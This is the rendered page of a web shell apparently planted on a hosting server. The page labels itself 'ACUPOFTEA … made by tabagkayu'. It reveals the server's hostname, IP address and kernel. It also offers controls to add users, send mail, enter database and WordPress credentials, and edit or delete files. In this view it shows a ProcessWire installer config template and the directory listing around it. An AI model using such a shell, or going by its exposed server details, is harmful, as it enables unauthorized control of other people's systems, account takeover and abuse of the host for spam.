System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
procwire
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.php
<?php namespace ProcessWire; /** * ProcessWire Configuration File * * Site-specific configuration for ProcessWire * * Please see the file /wire/config.php which contains all configuration options you may * specify here. Simply copy any of the configuration options from that file and paste * them into this file in order to modify them. * * SECURITY NOTICE * In non-dedicated environments, you should lock down the permissions of this file so * that it cannot be seen by other users on the system. For more information, please * see the config.php section at: https://processwire.com/docs/security/file-permissions/ * * This file is licensed under the MIT license * https://processwire.com/about/license/mit/ * * ProcessWire 3.x, Copyright 2025 by Ryan Cramer * https://processwire.com * */ if(!defined("PROCESSWIRE")) die(); /** @var Config $config */ /*** SITE CONFIG *************************************************************************/ // Let core API vars also be functions? So you can use $page or page(), for example. $config->useFunctionsAPI = true; // Use custom Page classes in /site/classes/ ? (i.e. template "home" => HomePage.php) $config->usePageClasses = true; // Use Markup Regions? (https://processwire.com/docs/front-end/output/markup-regions/) $config->useMarkupRegions = true; // Prepend this file in /site/templates/ to any rendered template files $config->prependTemplateFile = '_init.php'; // Append this file in /site/templates/ to any rendered template files $config->appendTemplateFile = '_main.php'; // Allow template files to be compiled for backwards compatibility? $config->templateCompile = false; /*** INSTALLER CONFIG ********************************************************************/ /** * Installer: Database Configuration * */ $config->dbHost = '[[softdbhost]]'; $config->dbName = '[[softdb]]'; $config->dbUser = '[[softdbuser]]'; $config->dbPass = '[[softdbpass]]'; $config->dbPort = '3306'; $config->dbCharset = 'utf8mb4'; $config->dbEngine = 'InnoDB'; /** * Installer: User Authentication Salt * * This value was randomly generated for your system on [[reg_date]]. * This should be kept as private as a password and never stored in the database. * Must be retained if you migrate your site from one server to another. * Do not change this value, or user passwords will no longer work. * */ $config->userAuthSalt = '[[salt_config]]'; /** * Installer: Table Salt (General Purpose) * * Use this rather than userAuthSalt when a hashing salt is needed for non user * authentication purposes. Like with userAuthSalt, you should never change * this value or it may break internal system comparisons that use it. * */ $config->tableSalt = '[[tablesalt]]'; /** * Installer: File Permission Configuration * */ $config->chmodDir = '0755'; // permission for directories created by ProcessWire $config->chmodFile = '0644'; // permission for files created by ProcessWire /** * Installer: Time zone setting * */ $config->timezone = 'America/New_York'; /** * Installer: Admin theme * */ $config->defaultAdminTheme = 'AdminThemeUikit'; /** * Installer: Unix timestamp of date/time installed * * This is used to detect which when certain behaviors must be backwards compatible. * Please leave this value as-is. * */ $config->installed = [[timestamp]]; /** * Installer: HTTP Hosts Whitelist * */ $config->httpHosts = array('[[domhost]]', 'www.[[domhost]]'); /** * Installer: Debug mode? * * When debug mode is true, errors and exceptions are visible. * When false, they are not visible except to superuser and in logs. * Should be true for development sites and false for live/production sites. * */ $config->debug = false;
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
php53
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
php56
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
php71
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
php81
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
php82
DIR
-
drwxr-xr-x
2025-05-10 09:39:32
.htaccess
text/plain
254 B
-rw-r--r--
2021-12-23 06:54:36
NOTES.txt
text/plain
1.58 KB
-rw-r--r--
2025-01-28 06:20:46
clone.php
text/x-php
4.91 KB
-rw-r--r--
2025-05-08 07:47:16
config.php
text/x-php
3.67 KB
-rw-r--r--
2025-01-28 06:20:46
edit.php
text/x-php
6.15 KB
-rw-r--r--
2025-05-08 07:47:16
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
132 B
-rw-r--r--
2022-05-17 03:24:48
import.php
text/x-php
3.76 KB
-rw-r--r--
2025-05-08 07:47:16
info.xml
text/html
7.21 KB
-rw-r--r--
2025-05-08 06:35:04
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
9.92 KB
-rw-r--r--
2025-05-08 07:47:16
install.xml
text/html
1.04 KB
-rw-r--r--
2022-05-17 03:24:48
md5
text/plain
5.08 KB
-rw-r--r--
2025-05-08 07:47:14
update_pass.php
text/x-php
1.03 KB
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
4.38 KB
-rw-r--r--
2025-05-08 07:47:16
upgrade.xml
text/plain
1.48 KB
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com